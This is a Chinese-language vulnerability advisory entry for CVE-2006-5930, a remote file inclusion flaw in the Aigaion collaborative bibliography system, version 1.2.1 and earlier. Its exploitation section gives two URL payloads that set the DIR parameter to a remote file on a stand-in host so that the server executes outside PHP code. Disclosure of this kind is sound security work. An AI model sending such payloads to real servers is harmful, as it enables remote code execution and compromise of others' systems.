添加时间:
2008-10-03

系统编号:
WAVDB-01074
BugCVE: CVE-2006-5930
BUGTRAQ: 21038

影响版本:
Aigaion <= 1.2.1

程序介绍:

Aigaion是一个基于Web的协作记录系统。

漏洞分析:

Aigaion的实现上存在多个输入验证漏洞，远程攻击者可能利用此漏洞在服务器上执行任意命令。 Aigaion的多个脚本没有正确检查过滤DIR变量数据的输入，允许攻击者通过包含本地或外部资源任意文件导致执行任意PHP代码。

漏洞利用:

http://www.example.com/[PATH]/_basicfunctions.php?DIR=http://www.example2.com/uhoh.txt?
http://www.example.com/path/pageactionauthor.php?DIR=http://www.example2.com/uhoh.txt?


解决方案:
厂商补丁：
Aigaion
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
http://www.aigaion.nl/